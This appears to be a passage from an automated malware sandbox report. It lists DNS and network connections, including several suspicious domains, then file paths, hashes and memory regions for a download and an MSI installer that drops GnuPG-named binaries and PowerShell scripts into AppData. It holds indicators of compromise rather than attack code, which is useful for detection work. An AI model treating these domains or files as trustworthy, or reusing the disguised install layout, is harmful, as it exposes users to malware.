US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 84.27.250.142.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.213.14:443 apis.google.com udp
GB 172.217.169.10:443 blobcomments-pa.clients6.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 216.58.201.97:443 lh3.googleusercontent.com udp
US 8.8.8.8:53 peoplestackwebexperiments-pa.clients6.google.com udp
GB 172.217.16.234:443 peoplestackwebexperiments-pa.clients6.google.com tcp
GB 172.217.16.234:443 peoplestackwebexperiments-pa.clients6.google.com tcp
GB 172.217.16.234:443 peoplestackwebexperiments-pa.clients6.google.com udp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 104.21.91.188:443 youradexchange.com udp
US 172.67.210.218:443 confidence-x.com udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
GB 142.250.200.14:443 play.google.com udp
GB 216.58.201.106:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 104.21.8.108:443 pubtrky.com udp
NL 142.250.27.84:443 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
US 8.8.8.8:53 google.com udp
GB 216.58.201.110:443 google.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com tcp
GB 172.217.169.67:443 beacons.gvt2.com tcp
GB 172.217.169.67:443 beacons.gvt2.com udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 234.17.178.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 216.239.32.117:443 beacons2.gvt2.com tcp
US 216.239.32.117:443 beacons2.gvt2.com udp
GB 216.58.201.110:443 google.com udp
US 8.8.8.8:53 117.32.239.216.in-addr.arpa udp
US 104.21.8.108:443 pubtrky.com udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 aprel88.com udp
US 172.67.153.234:80 aprel88.com tcp
US 172.67.153.234:443 aprel88.com tcp
US 8.8.8.8:53 234.153.67.172.in-addr.arpa udp
US 8.8.8.8:53 death1488.com udp
US 172.67.151.174:80 death1488.com tcp
US 8.8.8.8:53 174.151.67.172.in-addr.arpa udp
US 8.8.8.8:53 the.earth.li udp
GB 93.93.131.124:443 the.earth.li tcp
US 8.8.8.8:53 124.131.93.93.in-addr.arpa udp
US 8.8.8.8:53 good2-led.com udp
US 104.21.32.201:80 good2-led.com tcp
US 104.21.32.201:443 good2-led.com tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 201.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 201.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 t9z.lol udp
US 172.67.196.42:443 t9z.lol tcp
US 8.8.8.8:53 42.196.67.172.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 104.21.68.134:80 raur94.com tcp
US 104.21.68.134:443 raur94.com tcp
US 8.8.8.8:53 complete-s.monster udp
US 104.21.46.166:80 complete-s.monster tcp
US 104.21.46.166:443 complete-s.monster tcp
US 8.8.8.8:53 134.68.21.104.in-addr.arpa udp
US 8.8.8.8:53 1blob.monster udp
US 172.67.176.222:443 1blob.monster tcp
US 8.8.8.8:53 166.46.21.104.in-addr.arpa udp
US 8.8.8.8:53 222.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp

Files

\??\pipe\crashpad_204_VWGSPUCVPNUGQLYZ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ac9a01cb3d330c8ba3d386040858e5ce
SHA1 41456d64db198baae4e9290eca1193b18ab7c218
SHA256 579a8df5be1206410748a7c8b6f35eb9a13701a15bdbce117adbf5e31180430b
SHA512 38fd939d6944c7235d05bc6bab84a4460bc6d85d02497b78781f2241fb73c34b8e120661aaf3357deab4b1b00e09a7f0551cfc91238d4a2762ae314d24548913

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d2267146101e6224dc641bd933d3132a
SHA1 7fa4dc87d778515cb8c011327094925f0c25c0e0
SHA256 5682b0bc3a3b32e7a7a99b8605aafa62969a5d3759880c3b687207a31b54bdb6
SHA512 f19d93a349de0906f17b203a04872ba08d031114dc19aa6c5802f2bbd3ba181368ced4767cb57273d6b73636c3244aaa44cf55b64d490aa65690d29db251887c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 63c69c14a148749cfe6d75ef98e2b643
SHA1 f7e39e653eaa8ce5d15b5fe1125683c9e709791f
SHA256 7dfd3b846a4ea9c3779e7fc684e3a75cbeda90b5b0885d9ff6d3bc330e396880
SHA512 c1be64a1a33c899ceecf2ff71f59f4beed54dd787108b7f15da85e48b9c1f8ce45a29419bf967d7035cd11e9a06637b03b461087d4ef43ce0ff3116280af74d8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ec65c1a47dda3ac12522eceae8caa916
SHA1 caa134cfda2eb7a3cc01e5d7996442d8ea71bd2d
SHA256 b4bd7f7fbca906e525d7e74fa34bb6a8f36f2b19e946a4d0292400e75934af9b
SHA512 bb60d12cf807a189d9cbde9e8131f2f05c657228bf87ab04e32121e2982a32659f0d81a508f81293b9b66cfc64a1543c16053033885c51e01faf81a12eac497a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 881eb75be40a0552d63b2058c14f6b16
SHA1 8c60eb21dfcf90a7a037c3d52357d8cfffb711e7
SHA256 28597db97f3402cecf057be9cd92c6ee40533c8400acf4ce916209bdd17793b9
SHA512 4a3f2d2c1feee6d1bbdc5fe564f49f1a8ecaf8ed92479554396f5a0bdf3d4ebe8084e8f97181daae5e4babe0a3e980cf929f8c25ef064e27d7ef1b2068540018

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a165e125c5e4cc55112b5fd7729247b6
SHA1 eee844f8ad23dbe233b8b93e51e31ea8ccd234e8
SHA256 ff8ea74ede9da10a4c413f40ec79dba32ddd2676c2f387d28f677dc2e6522e1a
SHA512 1f34de7fad42e7ffc6cd28106907d2f30ec8686f3527d1443018eecd0707021202a2218ede67a7ff13f94241f75ba506aa34e4760bfdec4a461e83af67257b28

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

MD5 1128652e9d55dcfc30d11ce65dbfc490
SHA1 c3dc05f00453708162853a9e6083a1362cc0fc26
SHA256 b189ff1f576a3672b67406791468936b4b5070778957ba3060a7141200231e4e
SHA512 75e611ba64a983b85b314b145a6d776ed8c786f62126539f6da3c1638bf7e566c11daf18d1811b07656de47ff8b50637520cf719a2cacc77a9d27393fc08453b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7cee153545c2ab4f12bf5711cc3353b5
SHA1 f57adc37535d88a524ebc3928efba867c853a6d0
SHA256 530a68d15c602ac772cecec9e6963e041374ff5a23487f982155a01e8bc91f71
SHA512 e8e7cd56c782d72f4197736d55ff915ef5616ccf5975ccc094aec3bda072f46165b48b4da28dbc71ae6ff100d36c08292362802d93b1c3b570916982a2c4e595

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 755f1a800e2fe7075bbadd2f3710818a
SHA1 522da7c5916502edb5c0af82a8f76473af246953
SHA256 640ebb7348e47796c36b8dc7db1cf5cc6b23501f84e681b6919c549d5debc218
SHA512 0c8f11b537236de364ee86e24c9373167075e07f6b2bf6e028e6581e74d82b3581c914cd1fb1fed9b265baccd2374fc4b91bb12503f507ad8d4b79682da7661a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 77cf3222eaf69fb7a4d6355a01e71ca8
SHA1 0bcee866170a3fd2cc1bf76f056e7235bd97e19b
SHA256 457c2b440bb17f39185a439d8c97b2b2d147fb11709c022e0859ffb1c650201d
SHA512 4aa221ef76cac2346426b7fb9eec16b0ee3dd8fc2542ed200ec0068a270abef349be6709aebcbeba24dc6391ed3f12603d08309a7bf7b459d4fb89c42426e3bf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 060c85d594bd655f2eb2489949ca2d4a
SHA1 b85ec0c39d3315dc142ef21d5df009c60c29fb49
SHA256 c1f10b5c0a7be8a398d24a12261bf6869da2374c0231eb911350459a8bcb644f
SHA512 e28982c883157180507a89c8a1203a7cbd28ea3e7520c7f708cbf89ff4eef9eca851a3442d27d81f6a98b50ced60d6bfc1950b8ed935f1e93693d7e8c70899fb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 85dfc381f25cbe663f36ee67317ac5b8
SHA1 44add14bf4576b9a6eaccdc1845de5aea022beda
SHA256 416ea578d2bab0caf06d6f98c688100a60dd81a702271e0b506315de2a48cd44
SHA512 c5e4378dd7840192d28dfb25e8ffd2edfe0a91393e5eea73a85e51561180238c8ad207fa7c3a095587cdd34ca89c03aded98281e82af8418349d70b75beaf745

C:\Users\Admin\Downloads\your_files.zip.crdownload

MD5 c47971b7ded4a1ccc5d1614208913237
SHA1 d55e7ac02a336ca8d958b3081c0cf8bd1178daef
SHA256 834c369a06df3985f492150c0efb2be3cb06bb6a8e5d477e54eefd2943e4561a
SHA512 4ba3b3ab62df88bd72c66e24f87a7461d413a7ffeacb28d16831cc470b45c82853d8e330ece1af910c2b13c739d29d846684e6ca94af22f66b2b084d13cfe26c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3fb9f8702c7dffbb1af981449f085478
SHA1 2c401bf690c6d273b2cf823538fef1a7eb653473
SHA256 70b94cb2b20c0e076919c369e89578fc538fd772b6335ec04c0bd27772070017
SHA512 238149c46c2db3361320a85092ca67aac2bb2e9d3ff949b868cfe29d2bff53429346211d815afe7d97c4708e00cd1731cb5ce8dece1a9dfc8a92abd2a3e2b80e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e675f40922676892ee415e4e1f124585
SHA1 2db1f08b160cdc07b9ad6663b974a58bce2b1cce
SHA256 9a6b7b66c04b06acb53ed753c239d55bdbae80369f97ddad3b0de33a988fb2b1
SHA512 5679183124f345396a122924e8ae576b99832b58600cb260dc9b8d5be2a09d0c46afde0e9c6902263e7e79600bffdf401cfd0913eb46732bb7ede60be963a096

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 8bf247eb4dfaf194e8009ae13a1c6d1a
SHA1 1e773d7798f6e68b4f1f95adfc1c0cf277e0f303
SHA256 e703889a9b2728db8fa90dba23314c119dd6bf5e70c759236fd21eae960adb92
SHA512 726111586dff1ab81ea60dac42f4835a45247d817bd5d79888b8db5b68be6cd8b28daab2492f1c0a77bfe5f017b68e0b38b7d50b79c66e120f3f42eafa057aa4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe587903.TMP

MD5 1ac3d12ad0ff5da1810123ab795b5b81
SHA1 c905b7e56c1059782365816fc7c78d9a5f423752
SHA256 bd427e626c00660141aaf1bca497695e35bb078610d26a4e6237c5bfc170e6d8
SHA512 3f5ddae0c6a324aef956910ad90d46f924e9b2707ef6b754db3d2ebf2c220e5e4f63e05cefdf2cb32c0e80711ae7bdf40b504be6d66de63d624cd09932dc72a8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 8d67bf92c3f3cf2b4f07a6a61c4cb9da
SHA1 c2c11d713da7c579b597670b072cfe081e91d474
SHA256 8e42f6bb615da38391dc1a37d6b1e7f5969573cb8bb56f3259ad3adb8e90de38
SHA512 e382bca9b3e2077bb549f862c5339713e4763fb49a8208ebf2a7dcfdb6cd8671b4602d0ff461d58bac58c438513f348884d73d48bee8c55d62202104605677d6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\96f0f519-8520-4de5-a470-fbb300fa2a19.tmp

MD5 8b08c98694da2e25a6a17ed6f172d34e
SHA1 3cb6dfc2a4a6abd9f7b683a9a5de2dce8bbdd026
SHA256 a66575e39e190ed43bf9a1798b5b86343322a80311066c7f5b8c982cc2c49fc8
SHA512 04be1fbe8938494f9a4adbe5d4b54a738ddeede4ae460f958d1c76d446ff9778460bf503db74994455c9762d22614a07fe87cf9020dc8376a8700957f84969e7

memory/1764-333-0x0000012BA92A0000-0x0000012BA92B0000-memory.dmp

memory/1764-337-0x0000012BA9E40000-0x0000012BA9E50000-memory.dmp

memory/1764-344-0x0000012BB2090000-0x0000012BB2091000-memory.dmp

memory/1764-346-0x0000012BB2110000-0x0000012BB2111000-memory.dmp

memory/1764-348-0x0000012BB21A0000-0x0000012BB21A1000-memory.dmp

memory/1764-349-0x0000012BB21B0000-0x0000012BB21B1000-memory.dmp

memory/1764-350-0x0000012BB21B0000-0x0000012BB21B1000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json

MD5 d89f5fcc780e7611d62f2637556293c6
SHA1 991aebc8dbb16aec5b5382ab3bcdc85e8121909e
SHA256 ca7d14d9d69ca16f104fcefb712f278be6b8745b9d332de53ed69cfe20cef5c8
SHA512 68e4e517a988db5f44b1287c7fe5364bd2ec1060b729c80c8ede65ea311c3d8516869cef921d2f208c3b2a28485935303f681217909cb798767766149c55ac04

memory/1764-365-0x0000012BB21E0000-0x0000012BB21E1000-memory.dmp

memory/1764-364-0x0000012BB21F0000-0x0000012BB21F1000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json

MD5 404a3ec24e3ebf45be65e77f75990825
SHA1 1e05647cf0a74cedfdeabfa3e8ee33b919780a61
SHA256 cc45905af3aaa62601a69c748a06a2fa48eca3b28d44d8ec18764a7e8e4c3da2
SHA512 a55382b72267375821b0a229d3529ed54cef0f295f550d1e95661bafccec606aa1cd72e059d37d78e7d2927ae72e2919941251d233152f5eeb32ffdfc96023e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 2158855ae2e9d4068443e22ecbcac318
SHA1 edeb032f0d215743ef484da00ddf464cefbbf705
SHA256 a966a40000014508d6d611fe2df06162f74b2c2c2fe06d0698cdd8ac83e06b7c
SHA512 692678d2d4054f365f05cccdf7deb0109921fb012d3bfce4583b7d18a30e9d6aa088d2ef05de30e2720d1f70846973d9a1cebbe68dfd3c0ea6288d285fb33882

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi

MD5 ac4651a8b7ad1aa545649f41adcf55ec
SHA1 b3ad74fb2ba077f5680f5d836b64dba930e76795
SHA256 6fd723b2334f2046fa8c2f9b3b8e6a4ad61a50508ec7a575b0ed114bcf975072
SHA512 a7dc96d802b58501e956458b7718d5d9c3259a9c4b627323e0cb223ce8490e1e1a1d35e6d2baa2a2f24f0e895e1f8bf3aabc3e16cc73f0d17386018629bd6047

C:\Users\Admin\AppData\Local\Temp\MSIC5D4.tmp

MD5 5a1f2196056c0a06b79a77ae981c7761
SHA1 a880ae54395658f129e24732800e207ecd0b5603
SHA256 52f41817669af7ac55b1516894ee705245c3148f2997fa0e6617e9cc6353e41e
SHA512 9afc180ebc10c0ee0d7306f4b7085608a4e69321044d474691587bf7e63f945888781a9fc5e69568d351ac690b0335214bd04bdf5c75fd8a3bd1ec4be5d3475a

C:\Users\Admin\AppData\Local\Temp\MSIac749.LOG

MD5 623ac6152418a2b069885227ab5a2dc5
SHA1 ef7f50f03fb17b4121327d1ea985aed098b0d848
SHA256 cc47c1405b412dfeeaff023c37f90a5244a87dce3fd4bc7e950dec8157852a25
SHA512 6596c46ee9599c26fb55cf142c4cbb027ac2dcaa5a65525564ee42d2e9779a5e8f45766c34c5f86d27e11d8629fff011c3a24ccb7f143b100ddb1c796754c96e

C:\Windows\Installer\MSICB17.tmp

MD5 e92be2ea6cbab4b209fdb91999efa600
SHA1 3a78425b5d9094945ab20257900da3f05f146465
SHA256 d5249e4b26c8a396c8d3806e0fd8ba01806520fd546d815cc912e693463c699a
SHA512 215f81ac83f64eb3706444d4e018a1f25c09f6bb93432097f5262ee32484cfa1362fb43c91ff12be9611342b6151c09a5381a1dca51ae85beb49e4a9d5edee2c

memory/1964-499-0x0000000070EE0000-0x00000000715CE000-memory.dmp

memory/1964-500-0x00000000073D0000-0x00000000073E0000-memory.dmp

memory/1964-498-0x0000000007350000-0x0000000007386000-memory.dmp

memory/1964-501-0x00000000073D0000-0x00000000073E0000-memory.dmp

memory/1964-502-0x0000000007A10000-0x0000000008038000-memory.dmp

memory/1964-503-0x0000000008080000-0x00000000080A2000-memory.dmp

memory/1964-504-0x0000000008120000-0x0000000008186000-memory.dmp

memory/1964-505-0x0000000008290000-0x00000000082F6000-memory.dmp

memory/1964-506-0x0000000008520000-0x0000000008870000-memory.dmp

memory/1964-507-0x0000000008370000-0x000000000838C000-memory.dmp

memory/1964-508-0x00000000084B0000-0x00000000084FB000-memory.dmp

memory/1964-509-0x0000000008B60000-0x0000000008BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1p3ra444.j3i.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/1964-525-0x000000000A210000-0x000000000A888000-memory.dmp

memory/1964-526-0x0000000009950000-0x000000000996A000-memory.dmp

memory/1964-531-0x0000000009C50000-0x0000000009CE4000-memory.dmp

memory/1964-532-0x0000000009BF0000-0x0000000009C12000-memory.dmp

memory/1964-533-0x000000000A890000-0x000000000AD8E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1

MD5 864314b82d5abb9a763656b69b18d73a
SHA1 0a19fad1c6170c07815ef63dcea07a82481049c9
SHA256 118b6745b9dbeeb7997a6c55c1a9c49bcb5afffe88836df31f98b9b39929eb14
SHA512 0e55053f9d1dcbca9f39a07f929973bd9daac3ac9567b2d3778fc07e9241840f12c08dfcc27951472d6a02d1978e01e3ad68cd578f91370a8da45052af592f01

memory/1964-535-0x00000000073D0000-0x00000000073E0000-memory.dmp

memory/1964-540-0x000000000AF60000-0x000000000B122000-memory.dmp

memory/1964-541-0x000000000B660000-0x000000000BB8C000-memory.dmp

memory/1964-546-0x0000000070EE0000-0x00000000715CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt

MD5 6157c8432a9fd8ab05fd72c085b9c50d
SHA1 36d6aadfc543d39fd298a910165c8f9773c8dfcc
SHA256 b2e19fe898c0e44dc05738beed9ddd8d780126188e446cc6ca08c407509ab5e4
SHA512 f1edc77787966cc88d2b69505fa758e8f78bed2d9d6b65f34d0f49067ffea5b42a6b7612d6810b1727cdbb9fcbb42b459d3d2f9677561e7b4a07834e2d9fdb6f

C:\Windows\Installer\MSID74D.tmp

MD5 4a3f6a4023abd6bba56534de47d20017
SHA1 02dd888e467143e2e35465d73f39cf3e66afad10
SHA256 a8dfdc283ad8d4dc6f500ddfab564e79dadae075c0d54784b50e1ca548709b30
SHA512 580c7918ef90eb0020901bab645b72bcaf945ceb5bd56c2e7847f229b31a961bc4cd4ca9cb2583db480947ca8a0880b5ae4bd26717217abcacc9754352aaba28

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libgpg-error-0.dll

MD5 45d4164d940ee65b4eb2854fca94293f
SHA1 162b1adf5c261bd4481c6549e5f17fbb1cad96b6
SHA256 0a5a9cd5743be10c506036ad7e60d89d035d36dc5aa376d6a3b86cc009ce5094
SHA512 4b6b95f65e51c26f07b99d3cf47512a3e3404b21cc92ccd73fccf7e1cba3657c37950ac57b39d1aa1f9fc37727b4058a29a6e4a3b7fecba3dccd089b1da09dce

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libksba-8.dll

MD5 083f7e514d6b982f09f77e21af38b447
SHA1 69a69fe6328603f41429ddc67d1973f0f1b26c36
SHA256 7df2d8c02d76fdb0ea0d64261fd6a7cbfed0ca9c8f53c13de9da1731261392c0
SHA512 dff1d23470fa15a724040e883ee8a421d9193fccb29bbdd33090795e9d106bb388a22cfa2ffe83332ab535087ae8a2883f90b991e466a9ec49b2c67142675ff4

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libnpth-0.dll

MD5 a75aa079bab1f26fdf69b80f18e951c7
SHA1 1f64fc9d9e8500e0e015b3874d55e652d84df799
SHA256 8993c86367054b9f9e9ae517fd0025724d809832f8f6a9938a718cda23afb08c
SHA512 1834ca2e719baddafb6942d6ce7f45bdc14e95bb11fea968a052abaa03df5dc8d2703295fa15ba4c12f5ff14e842c805c1020f77618d6aba31b3127660b54300

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libsqlite3-0.dll

MD5 0db821923216fdd29f3ef752b67e0683
SHA1 4496a5ec7f08167faa3d2db4c225b962ece339c2
SHA256 70e479fbbc65ec754a0b6cc031f0e699468a6d4479c327a6f7c0a04cdca6a109
SHA512 15c35743c720b313daa65353b594967d90c8e67c69f5dfaf421e127afed0dcb42b09ce186d2359fd2579e9d835006ac3804742ba914062552f1a6e8b51a6dc05

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpg-check-pattern.exe

MD5 6ca7632cc5d6007fb6d29e1a8624664e
SHA1 50400a3fa8ee23a8f6b492fbc92c34e40bec8bbd
SHA256 124698ea407083fde0664ac4e950ea55f60d880f8ed636a05473a0e92e592dde
SHA512 62c8de1381115e2d7f787791ab53385b9c112696f2d7163b1c9e014eead13d9550f8f916d614f18ff791c23187ec987fd749e80fc4b376104ae6c1b6b0a0fc37

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-crt-conio-l1-1-0.dll

MD5 031dc390780ac08f498e82a5604ef1eb
SHA1 cf23d59674286d3dc7a3b10cd8689490f583f15f
SHA256 b119adad588ebca7f9c88628010d47d68bf6e7dc6050b7e4b787559f131f5ede
SHA512 1468ad9e313e184b5c88ffd79a17c7d458d5603722620b500dba06e5b831037cd1dd198c8ce2721c3260ab376582f5791958763910e77aa718449b6622d023c7

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-util-l1-1-0.dll

MD5 735636096b86b761da49ef26a1c7f779
SHA1 e51ffbddbf63dde1b216dccc753ad810e91abc58
SHA256 5eb724c51eecba9ac7b8a53861a1d029bf2e6c62251d00f61ac7e2a5f813aaa3
SHA512 3d5110f0e5244a58f426fbb72e17444d571141515611e65330ecfeabdcc57ad3a89a1a8b2dc573da6192212fb65c478d335a86678a883a1a1b68ff88ed624659

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-timezone-l1-1-0.dll

MD5 43e1ae2e432eb99aa4427bb68f8826bb
SHA1 eee1747b3ade5a9b985467512215caf7e0d4cb9b
SHA256 3d798b9c345a507e142e8dacd7fb6c17528cc1453abfef2ffa9710d2fa9e032c
SHA512 40ec0482f668bde71aeb4520a0709d3e84f093062bfbd05285e2cc09b19b7492cb96cdd6056281c213ab0560f87bd485ee4d2aeefa0b285d2d005634c1f3af0b

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 9d43b5e3c7c529425edf1183511c29e4
SHA1 07ce4b878c25b2d9d1c48c462f1623ae3821fcef
SHA256 19c78ef5ba470c5b295dddee9244cbd07d0368c5743b02a16d375bfb494d3328
SHA512 c8a1c581c3e465efbc3ff06f4636a749b99358ca899e362ea04b3706ead021c69ae9ea0efc1115eae6bbd9cf6723e22518e9bec21f27ddaafa3cf18b3a0034a7

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-synch-l1-2-0.dll

MD5 d175430eff058838cee2e334951f6c9c
SHA1 7f17fbdcef12042d215828c1d6675e483a4c62b1
SHA256 1c72ac404781a9986d8edeb0ee5dd39d2c27ce505683ca3324c0eccd6193610a
SHA512 6076086082e3e824309ba2c178e95570a34ece6f2339be500b8b0a51f0f316b39a4c8d70898c4d50f89f3f43d65c5ebbec3094a47d91677399802f327287d43b

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-synch-l1-1-0.dll

MD5 6c3fcd71a6a1a39eab3e5c2fd72172cd
SHA1 15b55097e54028d1466e46febca1dbb8dbefea4f
SHA256 a31a15bed26232a178ba7ecb8c8aa9487c3287bb7909952fc06ed0d2c795db26
SHA512 ef1c14965e5974754cc6a9b94a4fa5107e89966cb2e584ce71bbbdd2d9dc0c0536ccc9d488c06fa828d3627206e7d9cc8065c45c6fb0c9121962ccbecb063d4f

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-string-l1-1-0.dll

MD5 7a15b909b6b11a3be6458604b2ff6f5e
SHA1 0feb824d22b6beeb97bce58225688cb84ac809c7
SHA256 9447218cc4ab1a2c012629aaae8d1c8a428a99184b011bcc766792af5891e234
SHA512 d01dd566ff906aad2379a46516e6d060855558c3027ce3b991056244a8edd09ce29eacec5ee70ceea326ded7fc2683ae04c87f0e189eba0e1d38c06685b743c9

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\stylers.model.xml

MD5 343b8f55f376e88674733286d027f834
SHA1 466886054d5c2641ba6058f58a7a84053aa4696e
SHA256 f002b36e70f0fb159885c21fa6e6395176cd50a254201a94cbed756d9843fa9a
SHA512 ef6643badbb87739f0ae847d201651f8d3e677c54ca2aa3f81277b053355772f71d9b0f490617c104ce861a29e2b283fe6d82faf4cfe8f10bfc571d683cfea8e

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libintl-8.dll

MD5 16b4dba3e3bfdea7a528cc97721cbe60
SHA1 2a75d604f72ea1d1d929280b6b945b168a18f137
SHA256 b6939316ebc272b67fa90a8c599dceec0e22b93a7a9660c7b0db0ff1cc1308ae
SHA512 4d524e689a064a2a1d381033f05f635f0e5cb5863d0c1dd1cee4bf80303e0bf3db8d787ff52d348c6938bacea7ac695de10da747782696d18172951452a98ef9

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpg-wks-client.exe

MD5 ee38ab14557b765c80856531582f4f89
SHA1 660b872aaadd6658729f943f78bb45699e38f7c6
SHA256 4b0dfcc928a127b65928f6a941823b0e43c4cf08e2792e1e054a3886d51d8005
SHA512 4c4690c7af542ad5d67121259ec25dd67565273ea791f1a7e0536193f74115fb309054c44e336b19fee273dde71ab8543a2810a10dc2ba9eca5c7b286b46bcca

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpgtar.exe

MD5 a33215c3311b5819d6f12400b49333ab
SHA1 8d9338414b6e17cb9454b26b410abf7381e68eba
